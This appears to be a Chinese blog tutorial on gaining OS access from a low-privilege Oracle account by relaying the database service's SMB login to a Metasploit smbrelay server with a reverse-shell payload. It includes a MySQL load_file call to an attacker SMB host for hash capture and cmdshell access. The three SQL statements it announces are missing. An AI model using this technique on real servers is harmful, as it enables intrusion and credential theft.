Oracle 低權(quán)限數(shù)據(jù)庫(kù)賬戶得到 OS 訪問(wèn)權(quán)限 提權(quán)利用
這幾天看了篇叫"Penetration: from application down to OS (Oracle)"的文檔,感覺(jué)挺有意思的,文檔的 大概意思就是說(shuō),如果 ORACLE 服務(wù)是用 administrator 賬戶啟動(dòng)的,你只要有一個(gè)具有 resource 和 connect 權(quán)限的數(shù)據(jù)庫(kù)賬戶,就能利用 metasploit 的 smbrelay 功能,本地搭建一個(gè) SMB 欺騙服務(wù)器, 來(lái)得到系統(tǒng)的訪問(wèn)權(quán)限。我本地測(cè)試了下,還真的成功了。:-)
具體的原理分析看原文吧,我這里把我的測(cè)試過(guò)程寫出來(lái).
我的滲透環(huán)境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 數(shù)據(jù)庫(kù)版本為 10.2.0.1.0,服務(wù)啟動(dòng)權(quán)限為 administrator,數(shù)據(jù)庫(kù)賬戶用的是 dbsnmp 賬戶的默認(rèn)權(quán)限.
1.先用 netstat 命令查看一下,本地的 139 端口有沒(méi)有占用,一般占用此端口的服務(wù)就是 Samba 了,要關(guān)掉。ubuntu 的關(guān)閉方法是 sudo /etc/init.d/samba stop<p>
2.運(yùn)行 metasploit,我選用的 PAYLOAD 是 shell_reverse_tcp,做好相應(yīng)配置后,exploit.就能用 netstat 看到本地已經(jīng)監(jiān)聽(tīng)了 139 和 8522 端口了.
3.我現(xiàn)在使用 dbsnmp 默認(rèn)賬戶連接到 oracle 數(shù)據(jù)庫(kù)上,這個(gè)賬戶默認(rèn)權(quán)限是比較低的,只有 connect和 resource 權(quán)限。
4.然后執(zhí)行下面 3 條 SQL 語(yǔ)句
后來(lái)經(jīng)過(guò) pt007 的提醒,我又測(cè)試了 mysql,如果服務(wù)也是 administrator 啟動(dòng)的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系統(tǒng)權(quán)限的.MSSQL 應(yīng)該用 xp_dirtree 存儲(chǔ)過(guò)程 也是可以的,不過(guò)我沒(méi)有配置出來(lái)用 administrator 賬戶啟動(dòng) MSSQL 服務(wù),希望知道的朋友指點(diǎn)下我。
這個(gè)技術(shù)可以用到內(nèi)網(wǎng) WEB 評(píng)估的時(shí)候,如果有注入,服務(wù)又是 administrator 啟動(dòng)的,可以提權(quán)了。
兩個(gè)PDF下載,
作者:Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle%20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf
當(dāng)執(zhí)行完 create index 這句的時(shí)候,在看咱們本地的 metasploit,就已經(jīng)得到 ORACLE 數(shù)據(jù)庫(kù)主機(jī)的系 統(tǒng)當(dāng)前服務(wù)用戶的 half lm 哈希和 cmdshell 了。
- Javascript中的幾種繼承方式對(duì)比分析
- 淺析2種JavaScript繼承方式
- Javascript編程中幾種繼承方式比較分析
- JavaScript中的繼承方式詳解
- javascript學(xué)習(xí)筆記(九)javascript中的原型(prototype)及原型鏈的繼承方式
- JavaScript繼承方式實(shí)例
- Linux下SVN服務(wù)器同時(shí)支持Apache的http和svnserve獨(dú)立服務(wù)器兩種模式且使用相同的訪問(wèn)權(quán)限賬號(hào)
- 深入解析yii權(quán)限分級(jí)式訪問(wèn)控制的實(shí)現(xiàn)(非RBAC法)
- Oracle 10g各個(gè)帳號(hào)的訪問(wèn)權(quán)限、登錄路徑、監(jiān)控狀態(tài)命令查詢等等
- 127.0.0.1無(wú)法訪問(wèn),沒(méi)有權(quán)限: GetObject
- 使用Cacls命令設(shè)置服務(wù)器文件訪問(wèn)權(quán)限
- C++ 的三種訪問(wèn)權(quán)限與三種繼承方式
相關(guān)文章
PLSQL安裝、漢化和激活的方法步驟實(shí)現(xiàn)
這篇文章主要介紹了PLSQL安裝、漢化和激活的方法步驟實(shí)現(xiàn),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2019-09-09Oracle刪除字段中的空格、回車及指定字符的實(shí)例代碼
本文給大家分享Oracle刪除字段中的空格、回車及指定字符的實(shí)例代碼,非常不錯(cuò),具有參考借鑒價(jià)值,需要的的朋友參考下2017-03-03Oracle?listagg去重distinct的三種方式總結(jié)
這篇文章主要介紹了Oracle?listagg去重distinct的三種方式總結(jié),具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教2022-11-11檢測(cè)oracle數(shù)據(jù)庫(kù)壞塊的方法
這篇文章主要介紹了檢測(cè)oracle數(shù)據(jù)庫(kù)壞塊的方法 的相關(guān)資料,非常不錯(cuò)具有參考借鑒價(jià)值,需要的朋友可以參考下2016-05-05oracle中存儲(chǔ)函數(shù)與存儲(chǔ)過(guò)程的區(qū)別介紹
這篇文章主要介紹了oracle中存儲(chǔ)函數(shù)與存儲(chǔ)過(guò)程的區(qū)別介紹,非常不錯(cuò),具有參考借鑒價(jià)值,需要的朋友可以參考下2017-10-10Linux系統(tǒng)下導(dǎo)出ORACLE數(shù)據(jù)庫(kù)出現(xiàn)Exporting questionable statistics.錯(cuò)誤 處理
Linux系統(tǒng)下導(dǎo)出ORACLE數(shù)據(jù)庫(kù)出現(xiàn)Exporting questionable statistics.錯(cuò)誤 處理...2007-03-03